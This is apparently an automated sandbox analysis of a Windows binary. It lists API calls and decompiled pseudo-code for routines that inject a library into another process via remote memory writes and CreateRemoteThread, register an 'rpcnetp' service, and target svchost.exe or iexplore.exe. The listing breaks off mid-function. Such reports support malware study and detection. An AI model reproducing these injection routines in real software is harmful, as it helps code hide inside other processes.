Part of subcall function 001D3683: lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
Part of subcall function 001D3683: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
Part of subcall function 001D3683: VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3

CloseHandle.KERNEL32(00000000), ref: 001D31A8

Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087

TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 001D322D
CloseHandle.KERNEL32(?), ref: 001D3236
CloseHandle.KERNEL32(?), ref: 001D3247
CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 001D326D
SetStdHandle.KERNEL32(000000F6,00000000), ref: 001D327B

Part of subcall function 001D2965: SetStdHandle.KERNEL32(000000F4,?,00000000,001D3289,?), ref: 001D296D
Part of subcall function 001D2965: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2976
Part of subcall function 001D2965: CloseHandle.KERNEL32(?), ref: 001D297D

Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32C2
Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32CC
Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32D6

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3
memorystringinjection

Similarity

Total matches: 3
API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
String ID: !$@
API String ID: 677720824-1106925043
Opcode ID: 48e15aef3bb8d9777781a255bb2fadf36b491b6b4ce89551302cf184b035be13
Instruction ID: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
Opcode Fuzzy Hash: 1ED0A7C0494E42C1C125A5022CE13A7E244EF0129ECED037079802B6EFBF42313DEF0A
Instruction Fuzzy Hash: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00

C-Code - Quality: 88%

			E00403683(void* __ecx, void* _a4, void* _a8, char _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						_t7 =  &_a12; // 0x402421
						E00403020(_t20, _t18, __imp__LoadLibraryA, _t22,  *_t7,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x00403683
0x00403686
0x00403687
0x0040368c
0x004036a3
0x004036a7
0x004036c3
0x004036cb
0x004036d6
0x004036d6
0x004036e3
0x004036e3
0x004036f0

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,004031F9,?,?,00000000,?,00000000), ref: 0040369D
lstrlenA.KERNEL32(?,00000000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036AE
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036BB
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036E3

Part of subcall function 00403020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
Part of subcall function 00403020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
Part of subcall function 00403020: GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
Part of subcall function 00403020: CloseHandle.KERNEL32(?), ref: 00403087

Strings

!$@, xrefs: 004036CB

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3
memorystringinjection

Similarity

Total matches: 3
API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
String ID:
API String ID: 677720824-0
Opcode ID: db6d812f9c7be18267a37d50a3ba51ee4b957c21e9a373aaaee3175b4369baed
Instruction ID: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
Opcode Fuzzy Hash: 70D0A780494E46F4C407B5424C2D326D344EF001D9CDE437074000A6F6BE4A322DEF4A
Instruction Fuzzy Hash: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7

C-Code - Quality: 87%

			E001D3683(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E001D3020(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x001d3683
0x001d3686
0x001d3687
0x001d368c
0x001d36a3
0x001d36a7
0x001d36c3
0x001d36d6
0x001d36d6
0x001d36e3
0x001d36e3
0x001d36f0

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3

Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6
timewindow

Similarity

Total matches: 6
API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent
String ID: d
API String ID: 2989656138-2564639436
Opcode ID: 84e743ce579fb83e573cc9db47027a5d92d4bae25c0e57b22563aa8666223114
Instruction ID: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
Opcode Fuzzy Hash: E9F046477B4A8431CD8BB564500D3E2E187676A2C2DED9667F9087228CDB8C77460E87
Instruction Fuzzy Hash: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1

C-Code - Quality: 100%

			E001D23B1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				int _t14;
				int _t17;
				void* _t20;
				int _t21;
				void* _t22;
				void* _t25;
				int _t28;
				_Unknown_base(*)()* _t32;
				void* _t34;
				struct HWND__* _t35;

				_t35 = _a4;
				_t14 = _a8;
				_t32 = 0;
				if(_t14 == 0) {
					L17:
					KillTimer(_t35, 0x64);
					do {
						_t17 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t17;
					} while (_t17 != 0);
					PostQuitMessage(_t32);
					__eflags = _a8 - 0x11;
					if(_a8 == 0x11) {
						L4:
						return DefWindowProcA(_t35, _a8, _a12, _a16);
					}
					L20:
					return 0;
				}
				_t20 = _t14 - 0xf;
				if(_t20 == 0) {
					 *0x1d5078 = 1;
					 *0x1d5049 = _t32;
					 *0x1d50bc = _t32;
					L12:
					_t21 = E001D1466(_t34, _a16);
					__eflags = _t21;
					if(_t21 != 0) {
						goto L20;
					}
					_t22 =  *0x1d50c8; // 0x0
					__eflags = _t22 - _t32;
					if(_t22 != _t32) {
						 *0x1d5078 = 1;
						SetEvent(_t22);
					}
					__eflags =  *0x1d5078 - _t32; // 0x0
					if(__eflags != 0) {
						goto L17;
					} else {
						SetTimer(_a4, 0x64, 0x6ddd00, _t32);
						goto L20;
					}
				}
				_t25 = _t20 - 0x102;
				if(_t25 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L4;
					}
					KillTimer(_t35, 0x64);
					do {
						_t28 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t28;
					} while (_t28 != 0);
					E001D32E0(_t32, _t34, _t35);
					__eflags =  *0x1d506c; // 0x0
					if(__eflags == 0) {
						SetTimer(_t35, 0x64, 0x6ddd00, 0);
					}
					goto L4;
				}
				if(_t25 == 0x2ed) {
					goto L12;
				}
				goto L4;
			}

APIs

DefWindowProcA.USER32(?,00000011,?,?), ref: 001D23E8
KillTimer.USER32(?,00000064), ref: 001D23FE
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D2412
SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2434

Part of subcall function 001D1466: PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
Part of subcall function 001D1466: WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
Part of subcall function 001D1466: CloseHandle.KERNEL32 ref: 001D149C
Part of subcall function 001D1466: CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592

SetEvent.KERNEL32(00000000), ref: 001D246C
SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2485
KillTimer.USER32(?,00000064), ref: 001D2490
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D24A4
PostQuitMessage.USER32(00000000), ref: 001D24AF

Strings

d, xrefs: 001D23F5

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6
synchronizationregistrythread

Similarity

Total matches: 6
API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler
String ID: rpcnetp
API String ID: 1312310708-3180878357
Opcode ID: 6fa48f6244e0a94e0ec1405d0d9bbe99e9497798e0a464c9f7457b8b0bb501eb
Instruction ID: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
Opcode Fuzzy Hash: 56F0271719401EB3C803F8B38C6C73B17026B599C9EED734531627408CAA0D3244DF4B
Instruction Fuzzy Hash: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82

C-Code - Quality: 75%

			E001D34E1() {
				long _v32;
				int _t3;
				struct HWND__* _t10;
				intOrPtr _t17;
				void* _t21;

				 *0x1d504c = CreateEventA(0, 1, 0, 0);
				 *0x1d5050 = 0x10;
				 *0x1d505c = 0x42a;
				 *0x1d5060 = 1;
				_t3 = RegisterServiceCtrlHandlerA("rpcnetp", E001D2FDE);
				 *0x1d50b8 = _t3;
				if(_t3 != 0) {
					_push(0);
					_push(0x1388);
					_t17 = 2;
					_push(_t17);
					 *0x1d5058 = 1;
					E001D2619();
					 *0x1d5058 = 5;
					E001D2619(4, 0, 0);
					E001D35DB();
					 *0x1d505c = 0;
					 *0x1d5060 = 0;
					_t21 = CreateThread(0, 0, E001D2C05, 0, 0,  &_v32);
					if(_t21 != 0) {
						WaitForSingleObject( *0x1d504c, 0xffffffff);
						_t10 =  *0x1d50c0; // 0x0
						if(_t10 != 0) {
							PostMessageA(_t10, 0x11, 0, 0);
						}
						WaitForSingleObject(_t21, 0x7530);
						CloseHandle(_t21);
					} else {
						 *0x1d5060 = _t17;
					}
					CloseHandle( *0x1d504c);
					return E001D2619(1, 0, 0);
				}
				return _t3;
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D34ED
RegisterServiceCtrlHandlerA.ADVAPI32(rpcnetp,001D2FDE), ref: 001D351C

Part of subcall function 001D2619: SetServiceStatus.ADVAPI32(001D5050,001D3546,00000002,00001388,00000000), ref: 001D263F

Part of subcall function 001D35DB: RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
Part of subcall function 001D35DB: RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
Part of subcall function 001D35DB: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
Part of subcall function 001D35DB: RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639

CreateThread.KERNEL32(00000000,00000000,001D2C05,00000000,00000000,?), ref: 001D3578
WaitForSingleObject.KERNEL32(000000FF), ref: 001D359A
PostMessageA.USER32(00000000,00000011,00000000,00000000), ref: 001D35AA
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001D35B6
CloseHandle.KERNEL32(00000000), ref: 001D35B9
CloseHandle.KERNEL32 ref: 001D35C5

Strings

rpcnetp, xrefs: 001D34F8

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6
thread

Similarity

Total matches: 6
API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent
String ID: x
API String ID: 3363633688-2363233923
Opcode ID: fde0bc8fb109669d3739e76c01462afd47aceeb39e8aeb63b7d363bff009e474
Instruction ID: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
Opcode Fuzzy Hash: 9FF02BD509C909B3D07734881B12F222385FF82DDDD4EDB3538B4642C6BF09A50AA754
Instruction Fuzzy Hash: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37

C-Code - Quality: 84%

			E001D2165() {
				int _t51;
				void _t52;
				long _t54;
				void* _t56;
				intOrPtr* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t69;
				void* _t70;

				_push(0xdb0);
				_push(0x1d1400);
				E001D1637(_t60, _t64, _t67);
				 *(_t70 - 0x1c) =  *(_t70 - 0x1c) & 0x00000000;
				_t61 = GetStdHandle(0xfffffff4);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_t65 =  *(_t70 + 8);
				if(ReadProcessMemory(_t61, _t65, _t70 - 0x30, 0x10, _t70 - 0x34) == 0) {
					L16:
					 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
					ExitThread( *(_t70 - 0x1c));
				}
				_t66 = _t65 -  *((intOrPtr*)(_t70 - 0x2c));
				if(ReadProcessMemory(_t61, _t65 -  *((intOrPtr*)(_t70 - 0x2c)), _t70 - 0x20, 4, _t70 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t70 - 0x30) == 0x78 ||  *(_t70 - 0x30) == 0x1bc8) {
					__eflags =  *(_t70 - 0x24);
					if( *(_t70 - 0x24) == 0) {
						goto L15;
					}
					_t51 = ReadProcessMemory(_t61,  *(_t70 - 0x28), _t70 - 0xdc0,  *(_t70 - 0x24), _t70 - 0x34);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L16;
					}
					_t52 =  *(_t70 - 0x30);
					_t62 =  *(_t70 - 0x20);
					_t69 = _t52 +  *(_t70 - 0x20);
					 *((intOrPtr*)(_t70 - 0x3c)) = _t69;
					__eflags = _t52 - 0x78;
					if(_t52 == 0x78) {
						_t56 = 0xd80 -  *((intOrPtr*)(_t69 + 8));
						 *((intOrPtr*)(_t70 - 0x40)) = 0xd80;
						__eflags =  *(_t70 - 0x24) - 0xd80;
						if( *(_t70 - 0x24) > 0xd80) {
							_t62 =  *(_t70 - 0x24) - _t56;
							__eflags =  *(_t70 - 0x24) - _t56;
							E001D176E(_t66,  *(_t70 - 0x24) - _t56, _t69, 0,  *(_t70 - 0x24) - _t56);
						}
					}
					_t54 = E001D20DA(_t61, _t62, _t69, _t70 - 0xdc0,  *(_t70 - 0x24));
					goto L14;
				} else {
					if( *(_t70 - 0x30) != 0x3708) {
						L15:
						 *(_t70 - 0x1c) = 1;
						 *( *(_t70 - 0x20) + 0x5c) =  *( *(_t70 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_t59 =  *(_t70 - 0x20) + 0x3708;
						 *((intOrPtr*)(_t70 - 0x38)) = _t59;
						_push( *_t59);
						if( *(_t70 - 0x28) == 0) {
							_t54 = ResetEvent();
						} else {
							_t54 = SetEvent();
						}
						L14:
						 *(_t70 - 0x1c) = _t54;
					}
					goto L16;
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D217A
ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D219B
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21B4
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21ED
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001D1400,00000DB0), ref: 001D21F5
ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 001D2215

Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147

Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5

ExitThread.KERNEL32 ref: 001D2281

Strings

x, xrefs: 001D21BE

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6
registrystring

Similarity

Total matches: 6
API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat
String ID: [FILE]$SystemRoot$[FILE]
API String ID: 4133047914-1656360392
Opcode ID: ae84fe3816e58394a110c5285e10b2d815e972e04ba8194b59fa15e7161023db
Instruction ID: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653
Opcode Fuzzy Hash: 09D02ECA440F87F8661BB080082DF82B092FE633C04EC63003440592C18F8CB16FEF90
Instruction Fuzzy Hash: ed5e67ec67d69c723361dcf29c487c07ff661bc4f43c96eb3a608c29c8c24653

C-Code - Quality: 100%

			E001D3734(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				int _v12;
				char* _t13;
				char* _t23;
				long _t27;
				void* _t29;

				_t27 = _a8;
				_t23 = 0;
				_t29 =  *0x1d506c - _t23; // 0x0
				if(_t29 != 0 || GetEnvironmentVariableA("SystemRoot", _a4, _t27) == 0) {
					if(RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe",  &_a8) == 0) {
						_v8 = _t27;
						if(RegQueryValueExA(_a8, _t23, _t23,  &_v12, _a4,  &_v8) == 0) {
							_t23 = 1;
						}
						RegCloseKey(_a8);
					}
					_t13 = _t23;
				} else {
					lstrcatA(_a4, "\\System32\\svchost.exe");
					_t13 = 1;
				}
				return _t13;
			}

0x001d373a
0x001d373e
0x001d3740
0x001d3746
0x001d3784
0x001d3796
0x001d37a1
0x001d37a5
0x001d37a5
0x001d37a9
0x001d37a9
0x001d37af
0x001d375b
0x001d3763
0x001d376b
0x001d376b
0x001d37b4

APIs

GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9

Strings

SystemRoot, xrefs: 001D374C
Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 001D3772
\System32\svchost.exe, xrefs: 001D375B

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6
threadinjection

Similarity

Total matches: 6
API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects
String ID: <
API String ID: 2446352009-4251816714
Opcode ID: c8242842e98a66eb1eacbd90598b53cfcf33de66ab7a76e9081f6078d45f9eb3
Instruction ID: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
Opcode Fuzzy Hash: ED0168420642E5B3F54776C41649B2051A1EF43AF5E2C032379BDB26C81B88AE29BF89
Instruction Fuzzy Hash: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30

C-Code - Quality: 93%

			E001D27E6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t73;
				void* _t78;
				void* _t83;
				void* _t84;

				_push(0xe4);
				_push(0x1d13d0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x28)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E001D384D(_t84 - 0xb4, 0, 0x40);
				 *((short*)(_t84 - 0xb4)) = 0x3c;
				E001D3834(_t84 - 0xf4, _t84 - 0xb4, 0x40);
				E001D3864(_t84 - 0x74, _t84 - 0xf4, _t84 - 0xb4);
				 *((intOrPtr*)(_t84 - 0x40)) = E001D3C08;
				 *((intOrPtr*)(_t84 - 0x3c)) = E001D3C9A;
				 *((intOrPtr*)(_t84 - 0x38)) = E001D1C6D;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x34) = _t83;
				 *_t83 = 0x238;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x28)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t73 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E001D1722(E001D2997), _t83, 4, _t84 - 0x2c);
					 *(_t84 - 0x1c) = _t73;
					if(_t73 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *((intOrPtr*)(_t84 - 0x24)) = E001D17D0;
				_t78 = E001D1CFD;
				_t56 =  *((intOrPtr*)(_t83 + 0x6c)) - 3;
				if(_t56 == 0) {
					L7:
					_t78 = 0;
					goto L8;
				} else {
					if(_t56 != 1) {
						L8:
						_t76 = _t83 + 0x1bc8;
						if(E001D1E99(_t83, _t83 + 0x1bc8, _t78, 2) == 0 || E001D1E99(_t83, _t83 + 0x78,  *((intOrPtr*)(_t84 - 0x24)), 1) == 0) {
							L17:
							return E001D173E(E001D38F2(_t84 - 0x74));
						} else {
							 *(_t84 - 4) = 0;
							if( *((intOrPtr*)(_t84 - 0x28)) == 0) {
								E001D2F13(_t76, 0);
							}
							if( *(_t84 - 0x1c) == 0) {
								do {
									_push(_t84 - 0x74);
									__eflags = E001D2522(0, _t83, __eflags);
								} while (__eflags != 0);
								goto L16;
							} else {
								ResumeThread( *(_t84 - 0x1c));
								WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
								CloseHandle( *(_t84 - 0x1c));
								L16:
								 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
								goto L17;
							}
						}
					}
					 *((intOrPtr*)(_t84 - 0x24)) = 0;
					goto L7;
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808

Part of subcall function 001D3864: GetVersion.KERNEL32 ref: 001D3881

GetStdHandle.KERNEL32(000000F6), ref: 001D2880
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC

Part of subcall function 001D1E99: InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
Part of subcall function 001D1E99: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
Part of subcall function 001D1E99: SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E

CloseHandle.KERNEL32(?), ref: 001D2932

Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C

ResumeThread.KERNEL32(?), ref: 001D291A
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929

Strings

<, xrefs: 001D281C

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5
threadwindownetwork

Similarity

Total matches: 5
API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup
String ID:
API String ID: 2542947916-0
Opcode ID: 2b16ed5e52240c4d80d8b10e68765e774bd0f7290044ab9ce1d8eea53ab31f33
Instruction ID: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
Opcode Fuzzy Hash: E9014C02028CA5E7D0272B911CAA73B6042FF41FFCF9DA79271FC691C16F8596196F41
Instruction Fuzzy Hash: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2

C-Code - Quality: 91%

			E001D2648(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				void* _t54;
				void* _t56;
				void* _t63;
				void* _t65;
				void** _t71;
				void* _t75;
				void* _t76;

				_push(0x244);
				_push(0x1d13a0);
				E001D1637(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				E001D384D(_t76 - 0xa8, 0, 0x80);
				 *((intOrPtr*)(_t76 - 0x20)) = 5;
				while(1) {
					L1:
					 *(_t76 - 0x24) = 0;
					 *((intOrPtr*)(_t76 - 0x20)) =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					_t42 =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					if(_t42 == 0) {
						break;
					}
					_t56 = _t42 - 1;
					if(_t56 == 0) {
						_t69 =  *((intOrPtr*)(_t76 + 8));
						_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 2; // 0x0
